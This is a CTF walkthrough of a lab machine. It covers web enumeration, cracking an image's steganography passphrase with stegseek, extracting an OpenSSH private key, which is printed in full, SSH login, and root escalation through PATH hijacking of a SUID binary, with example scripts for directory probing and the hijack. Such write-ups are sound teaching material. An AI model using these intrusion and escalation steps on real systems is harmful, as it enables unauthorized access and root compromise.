[Untitled]

Published: 2024-03-29 · Views: 16 · Likes: 0

Find the target. Use nmap -sn 192.168.111.0/24 to sweep the current subnet for live hosts.

-sn skips the port scan and only does host discovery. It turned up 192.168.111.133.

Don't scan it yet. Browse straight to 192.168.111.133: it serves an ordinary-looking web page.

Looking at the content, this is a CTF challenge.

View the page source and there is an encoded string. Base64-decoding it several times yields something that looks useless.

It seems useless, but it ties things together: the decoded string is the same as the page title.

So the idea is to treat it as a directory name and append it to the URL.

And it really does turn up a hidden directory, containing a file that lists many more directories.

Visit all of them. Save the list first, then use sed to build candidate URLs for each possible base path:

sed 's|^|http://192.168.111.133|' secret.txt >> Secret.txt
sed 's|^|http://192.168.111.133/DRAGON%20BALL|' secret.txt >> Secret.txt
sed 's|^|http://192.168.111.133/DRAGON%20BALL/Vulhub|' secret.txt >> Secret.txt

After concatenation, the list looks like this.

But some entries contain spaces, which must be encoded as %20:

sed 's/ /%20/g' Secret.txt > SEcret.txt   # note the redirect: with two file arguments sed just reads both and prints to stdout

A Python script to request them all: every single one is a 404. Damn, a rabbit hole.

import requests

# One candidate URL per line, as produced by the sed commands above
with open('www.txt', 'r', encoding='utf-8') as f:
    for line in f:
        url = line.strip()
        res = requests.get(url)
        # Print the status code beside the URL so anything that is not a 404 stands out
        print(res.status_code, url)
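As an added example (not the post's own script), here is the whole candidate-building and probing procedure from the steps above in one POSIX shell script: every base path times every wordlist entry, spaces percent-encoded, each URL probed, and only non-404 answers printed. The base URL and the three base paths are the ones used above; the wordlist file name (secret.txt, one path per line), the use of curl and its timeout are assumptions.

```shell
#!/bin/sh
# Added example, not the post's own script. Does in one place what the three
# sed lines, the %20 substitution and the Python loop above do by hand:
# build every base-path x entry combination from the saved wordlist, encode
# spaces, and probe each URL, printing only responses that are not 404.
# The base URL and prefixes are taken from the walkthrough; the wordlist
# file name (secret.txt) and the curl timeout are assumptions.

BASE='http://192.168.111.133'

# build_urls PREFIX... : reads wordlist lines from stdin and prints
# "$BASE$PREFIX/$line" for each prefix, with spaces percent-encoded.
# Pass "" as a prefix for the web root. A leading slash on an entry and
# blank lines in the wordlist are tolerated.
build_urls() {
    while IFS= read -r path || [ -n "$path" ]; do
        if [ -n "$path" ]; then
            for prefix in "$@"; do
                printf '%s%s/%s\n' "$BASE" "$prefix" "${path#/}"
            done
        fi
    done | sed 's/ /%20/g'
}

# probe URL : prints "<status> <url>" unless the server answered 404.
# -o /dev/null discards the body; -w prints only the status code.
# A connection failure yields "000", which is still reported.
probe() {
    code=$(curl -s -o /dev/null -w '%{http_code}' --max-time 5 "$1") || code="000"
    if [ "$code" != "404" ]; then
        echo "$code $1"
    fi
}

# Usage: sh probe.sh secret.txt
if [ "$#" -ge 1 ]; then
    build_urls "" "/DRAGON%20BALL" "/DRAGON%20BALL/Vulhub" < "$1" |
    while IFS= read -r url; do
        probe "$url"
    done
fi
```

Because the script prints only non-404 results, a run that produces no output at all is the "rabbit hole" outcome described above, and a single line of output is the one worth opening in a browser.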

Check the image. Download it and examine it with a few tools.

┌──(root㉿kali)-[~/桌面]
└─# ls -liah aj.jpg
659682 -rw-r--r-- 1 root root 74K Mar 20 04:45 aj.jpg

┌──(root㉿kali)-[~/桌面]
└─# file aj.jpg
aj.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 959x535, components 3

┌──(root㉿kali)-[~/桌面]
└─# exiftool aj.jpg
ExifTool Version Number         : 12.76
File Name                       : aj.jpg
Directory                       : .
File Size                       : 75 kB
File Modification Date/Time     : 2024:03:20 04:45:57-04:00
File Access Date/Time           : 2024:03:20 04:45:58-04:00
File Inode Change Date/Time     : 2024:03:20 04:45:57-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 959
Image Height                    : 535
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 959x535
Megapixels                      : 0.513

Check for files appended to or embedded in the image:

┌──(root㉿kali)-[~/桌面]
└─# binwalk aj.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

Check for steganography. The passphrase entered was xmen.

xmen is the hint from the home page. steghide always prompts for a passphrase, so being asked for one does not by itself mean anything is embedded.

┌──(root㉿kali)-[~/桌面]
└─# steghide info aj.jpg
"aj.jpg":
  format: jpeg
  capacity: 4.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

Check for steganography again with a different tool.

The nice thing about this tool is that it can brute-force the passphrase with a wordlist. Kali ships rockyou.txt, but it is gzipped and has to be unpacked first (gunzip /usr/share/wordlists/rockyou.txt.gz).

The wordlist is large: 51 MB compressed, 134 MB uncompressed.

┌──(root㉿kali)-[~/桌面]
└─# stegseek aj.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "love"

[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".

┌──(root㉿kali)-[~/桌面]
└─# ls
aj.jpg  aj.jpg.out  secret.txt  Secret.txt  SEcret.txt

┌──(root㉿kali)-[~/桌面]
└─# cat aj.jpg.out
-----BEGIN OPENSSH PRIVATE KEY-----                                                                       
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn                                    
NhAAAAAwEAAQAAAYEAwG6N5oDbTLLfRAwa7GCQw5vX0GWMxe56fzIEHYmWQw54Gb1qawl/                                    
x1oGXLGvHLPCQaFprUek6CA8u2XPLiJ7SZqGAIg6XyyJY1xCmnoaU++AcI9IrgSzNyYlSF                                    
o+QEIvwkNNA1mx9HuhRmANb06ZGzYDY6pGNvTSyvD4ihqiAXTye2A/cZmw7p5KLt4U0hSA                                    
qucYb/IA4aa/lThOSp5QWSmPKaTm0FALRX38dRWbTBv5iR/qQFDheot+G3FlfGWqEBNuX8                                    
SWnloCMT7QU+2N3YZYoDLI3zrQIOotKPbIUOWzciVpLXpnHPuKmHQ2SX6oJYmqpESID6l5                                    
9ciPQzn2d7yGTZcyYO0PtnfBFngoNL1f55puIly39XeNWiUPebVSb5jBEyl+3pZ96s/BO5                                    
Wvdopgb5VQX3h0832L3AkgW2X3tQp5FdkE/9nqxkSMfzZ6YdadpGVY5KboFiMnxWQyvB0a                                    
ucq45Tn9kyfAAj2AQF46L9udVE4ylEkKw17oVaD5AAAFgKIce5GiHHuRAAAAB3NzaC1yc2                                    
EAAAGBAMBujeaA20yy30QMGuxgkMOb19BljMXuen8yBB2JlkMOeBm9amsJf8daBlyxrxyz                                    
wkGhaa1HpOggPLtlzy4ie0mahgCIOl8siWNcQpp6GlPvgHCPSK4EszcmJUhaPkBCL8JDTQ                                    
NZsfR7oUZgDW9OmRs2A2OqRjb00srw+IoaogF08ntgP3GZsO6eSi7eFNIUgKrnGG/yAOGm                                    
v5U4TkqeUFkpjymk5tBQC0V9/HUVm0wb+Ykf6kBQ4XqLfhtxZXxlqhATbl/Elp5aAjE+0F                                    
Ptjd2GWKAyyN860CDqLSj2yFDls3IlaS16Zxz7iph0Nkl+qCWJqqREiA+pefXIj0M59ne8                                    
hk2XMmDtD7Z3wRZ4KDS9X+eabiJct/V3jVolD3m1Um+YwRMpft6WferPwTuVr3aKYG+VUF                                    
94dPN9i9wJIFtl97UKeRXZBP/Z6sZEjH82emHWnaRlWOSm6BYjJ8VkMrwdGrnKuOU5/ZMn                                    
wAI9gEBeOi/bnVROMpRJCsNe6FWg+QAAAAMBAAEAAAGBAL3SUJf4tFtMd4Egj85s02Ch8p                                    
nYEq2NObkPFZAtkNRFCaQafUdo72svGueFP0AI8q7bEuujqMByTHZvT5gq24MXsugDedE4                                    
la417F2F5UK3FvPx47gFWuQj9NMSciXhJEt1KBsN98U7zzMkvRv3ZIC7H0zJQsojZ2xZmF                                    
JjQzw8qJWbs/nTqf04l+TznYY+Q05S+IA1MTlmy8Xe7RweXxQVMuvZhvYmf3fld4vn7HF/                                    
hwAFQ4Z+Qm4n/BYGHh5ACXQFffrEiJ4B/hvS8KinkhZ1FoMNTHlDVUR5ALoQ/w0pSTExVL                                    
WeV3f5E6yRlGf+IGMjptYEkgSO4ScJzVhqjxtLp6RRxDR1S9eOBFC1b4t0buefxOMRkKbJ                                    
xhOMubESFLDS/3Eq/pzOSPvFkzJSUitD+1yFiXeZA2f86Y+bZgfvS5EPo6xCqQq2EatZgN                                    
/WEhnEc6smCpCIf1NDuzVjZVmHwd3mv30DP2+RiSoZ4yKasukSCkbsMtiucIgu5WSdIQAA                                    
AMEAgcd2TQt4UEVmQ20rydBD+2qkQefw7nN27vq7IyUeDyr1CxhdPkFjFhVCCsk7lNsxtP                                    
pyFIVMFLAUlt3eoKp4qU26kCtTIOnPLrMsiOwhVk/NU5fFSK3dqzVPNiNjWaLOwDmFYb39                                    
s+aFuQm2Vy/RzkyHNRmdkVflJcrqNOQuGXzo2t8qsnaPI4QAzrjRWF53j0BHQqlRPfvlfz                                    
SCC+KuMNvPJRRzhuRQmsbq9RWSLQk73ouTJwb3j9J55V86KI0nAAAAwQDlKLzSrV6qkMTO                                    
fBDHyK45r0KC2h+a1f2GvSa+rfILHbxgGDCu6Qk4CJMgSVoM11EcDw0j/SxwsPlCxbqs0q                                    
R/4WusHj1v/ysFb9MFlEcdXZOZShozjBU9PmkIbTBPSfdV6YoWhY5icG9Yy1WgNTv4+shR                                    
Pl1uHDVsHxhbK1isOz5cV3dqxvSZHTQ3cQhIMxTvpXw+JAbpPzNXtSQ0raT1l94h0Kp6Hu                                    
WvXuSZzwM8hGfYYFYlqL1l7RR7N46nBAsAAADBANb4j6c/cBPuITtIw+/GPKBb1Z15Su6b                                    
cYmthvUYneQMnt2czKF3XqEvXVPXmnbu9xt079Qu/xTYe+yHZAW5j7gzinVmrQEsvmdejq                                    
9PpqvWzsLFnkXYEMWdKmmHqrauHOcH0hJtEmHuNxR6Zd+XjiRsPuBGxNRE22L/+j++7wxg                                    
uSetwrzhgq3D+2QsZEbjhO+ViDtazKZVjewBCxm7O0NhPFFcfnwTOCDLg+U8Wd1uuVT1lB                                    
Bd8180GtBAAaGtiwAAAAlrYWxpQGthbGk=                                                                        
-----END OPENSSH PRIVATE KEY-----      

Jackpot: it is an OpenSSH private key.

Approach: skip the nmap port scan for SSH and just try to connect directly, which makes less noise.

┌──(root㉿kali)-[~/桌面]
└─# ssh root@192.168.111.133 -i aj.jpg.out
The authenticity of host '192.168.111.133 (192.168.111.133)' can't be established.
ED25519 key fingerprint is SHA256:P12mV1blKWnZALZhtS7i9dBWGPg2ruqeEEv4IduCaGU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.111.133' (ED25519) to the list of known hosts.
root@192.168.111.133's password:

Trying root did not work: the key is not accepted for root and ssh falls back to a password prompt. Note that the prompt alone does not prove root login is enabled; sshd still asks for a password when PermitRootLogin is no, precisely so that it does not reveal which accounts exist.

So try other usernames. Now that we have the key, all that is missing is the username.

Approach: look at the home page and the login page for anything that could be a username.

ssh also refuses a private key whose file permissions are too open (it was 777 here); it must be 600, readable and writable by the owner only.

┌──(root㉿kali)-[~/桌面]
└─# chmod 600 密钥

┌──(root㉿kali)-[~/桌面]
└─# ssh xmen@192.168.111.133 -i 密钥
Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 07:09:06 2021 from 192.168.43.111
xmen@debian:~$

And we are in.

Finally, escalate to root. Start by finding SUID files (files that run with their owner's privileges, which for root-owned ones means root):

find / -perm -4000 -type f 2>/dev/null   

# fd 0 is standard input
# fd 1 is standard output
# 2>/dev/null: fd 2 is standard error; send it to /dev/null (the null device, not a folder) so the permission-denied noise is discarded

One of the root-owned SUID binaries is in the current (home) directory.

Compare its source code with what it does when run; the relationship should be obvious. It is a CTF, so it is kept simple.

The technique is privilege escalation through environment-variable (PATH) hijacking. I only half understand what follows.

First create a file that will be run to escalate. It could go in the home directory, but a temporary directory is the better place, so this time I will use /tmp.

Write a shell command into a file to execute later (here /tmp/ps containing /bin/bash, made executable with chmod +x).

Then change the environment: export PATH=/tmp:$PATH. This puts /tmp at the front, so command lookup starts in /tmp.

That hijacks the ps command: whenever the SUID binary runs an unqualified ps, the lookup finds /tmp/ps first and runs our shell command instead.

The result is a root shell. Why it is root: the SUID binary runs as root and calls ps by bare name through PATH, so our /tmp/ps inherits root and the /bin/bash inside it runs as root. One caveat: bash drops an effective uid that differs from the real uid unless started with -p, so if the binary only has euid 0 and never called setuid(0), /tmp/ps needs /bin/bash -p.
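To show the mechanism of the SUID enumeration and PATH hijack steps above concretely, here is an added example that is not from the original post. The challenge's SUID binary is not shown there, so a plain sh -c stands in for it; the victim and function names are my own. It runs without root and covers both halves: a victim that looks up ps through PATH, the fake ps planted in a scratch directory with that directory prepended to PATH (the walkthrough's export PATH=/tmp:$PATH), and a hardened victim that resets PATH before calling anything.

```shell
#!/bin/sh
# Added example; not from the original post. Shows, without needing root,
# why an unqualified "ps" inside a privileged program is hijackable through
# PATH, and what the fixed program should do instead. The victim functions
# are stand-ins for the challenge's SUID binary (whose source is not shown).

# Stand-in for the vulnerable binary: resolves "ps" through PATH, exactly
# as system("ps") or execvp("ps", ...) would. Prints the path it would run.
victim_vulnerable() {
    sh -c 'command -v ps'
}

# Hardened stand-in: resets PATH to trusted directories first, so a
# caller-controlled PATH cannot redirect the lookup. Calling /bin/ps by
# absolute path would be the other correct fix.
victim_hardened() {
    sh -c 'PATH=/usr/bin:/bin; export PATH; command -v ps'
}

# hijack VICTIM : plant a fake ps in a scratch dir, put that dir first in
# PATH (the walkthrough's "export PATH=/tmp:$PATH"), run VICTIM in that
# environment and report whether the fake binary is what got resolved.
hijack() {
    dir=$(mktemp -d)
    # The real payload in the walkthrough is /bin/bash (or /bin/bash -p,
    # see the caveat above); a no-op keeps this example harmless.
    printf '#!/bin/sh\nexit 0\n' > "$dir/ps"
    chmod 755 "$dir/ps"
    resolved=$(PATH="$dir:$PATH"; export PATH; "$1") || true
    rm -rf "$dir"
    if [ "$resolved" = "$dir/ps" ]; then
        echo hijacked
    else
        echo safe
    fi
}

# Demo when run directly.
echo "vulnerable victim: $(hijack victim_vulnerable)"   # hijacked
echo "hardened victim:   $(hijack victim_hardened)"     # safe
```

The SUID binary found with find above is exploitable this way only if it invokes ps (or any other program) by bare name; the same binary calling /bin/ps, or resetting PATH as victim_hardened does, is not affected by anything the low-privileged user exports.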

(The rest of the article is hidden behind the site's VIP paywall.)